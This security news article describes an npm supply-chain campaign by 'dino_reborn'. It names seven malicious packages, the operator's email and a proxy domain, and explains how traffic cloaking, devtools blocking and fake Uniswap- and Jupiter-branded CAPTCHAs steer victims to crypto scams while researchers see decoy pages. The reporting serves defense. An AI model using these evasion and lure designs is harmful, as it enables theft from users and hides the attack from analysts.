A sophisticated malware campaign has been discovered targeting the widely-used npm JavaScript package registry. Operating under the alias “dino_reborn,” the threat actor has deployed malicious packages designed to critically differentiate between potential victims and security researchers before triggering their harmful payloads. This advanced supply chain attack utilizes traffic cloaking technology and browser-based evasion tactics to deliver tailored malicious content, representing a new level of sophistication in cyber threats.
Seven malicious npm packages have been identified as part of this campaign: signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830. Six of these packages contain approximately 39 kilobytes of malware, while the seventh is responsible for constructing a malicious webpage. When a user visits a site deployed by these packages, the malware initiates an analysis of their behavior and system characteristics to classify them. Based on this classification, distinct experiences are presented, with potential victims encountering a convincing fake CAPTCHA leading to scam sites used for cryptocurrency theft, while researchers are shown only blank pages designed to hide the true nature of the attack.
Technical Analysis of the Detection Evasion Mechanism
Security analysts from Socket.dev identified and documented this intricate campaign by uncovering the interconnected infrastructure linking all the malicious packages to a single threat actor. Their investigation traced the creation email associated with these packages to geneboo@proton[.]me. The research team further revealed that the attacker was leveraging Adspect, a legitimate service typically used to distinguish between bots and real visitors, by weaponizing its capabilities within the npm packages.
The campaign’s design prioritizes evading both automated security scanners and manual analysis. Upon execution, the malware encapsulates its code within an Immediately Invoked Function Expression (IIFE), ensuring automatic execution without requiring explicit function calls. To actively deter researchers, the code employs aggressive tactics, including disabling browser developer tools, preventing right-click context menus, blocking keyboard shortcuts like F12, Ctrl+U, and Ctrl+Shift+I, and initiating continuous page reloads if developer tools are detected.
The core innovation of this npm malware campaign lies in its sophisticated fingerprinting system, which collects thirteen distinct data points from each visitor. When a user accesses a compromised website, the JavaScript payload gathers information such as the browser user agent, host information, referrer URL, request method, server hostname, protocol encryption status, request timestamp, language preferences, and accepted encoding formats. This comprehensive data collection creates a detailed profile that is transmitted to the Adspect API via a proxy endpoint, such as association-google.xyz/adspect-proxy.php, effectively replicating server-side request capabilities within the browser environment.
The decision-making logic within the campaign is critical. Adspect analyzes the characteristics of the traffic and returns a response indicating whether the visitor appears legitimate or suspicious. If Adspect determines the traffic originates from a researcher, it returns an “ok: false” status. This response triggers the display of a blank white page, which contains only innocuous text about Offlido, a fabricated offline storage company. This benign page appears legitimate to any analyst who might inspect it, thus providing a perfect cover.
Conversely, if Adspect identifies the visitor as a potential victim, it returns “ok: true” coupled with a malicious redirect URL. This then triggers the display of a fake CAPTCHA interface. This CAPTCHA is designed to mimic legitimate verification systems from prominent cryptocurrency exchanges like Uniswap and Jupiter, employing their branding to establish false credibility. When victims click the verification checkbox, a brief three-second loading animation plays, followed by a simulated success message and an automatic redirection to the malicious URL in a new browser tab. This psychological manipulation tactic, combined with a familiar interface, significantly increases the likelihood that victims will trust and engage with the redirect without raising suspicion.
The attacker’s infrastructure demonstrates considerable flexibility. Due to Adspect’s capability to return new redirect URLs with each request, the threat actor can modify the final destinations server-side without needing to republish any npm packages. This agility makes traditional takedown efforts reactive rather than preventative, allowing the campaign to remain operational even after initial detection and the removal of packages from the npm registry. The continued evolution of such supply chain attacks underscores the persistent threat to software development ecosystems and the ongoing need for enhanced security vigilance.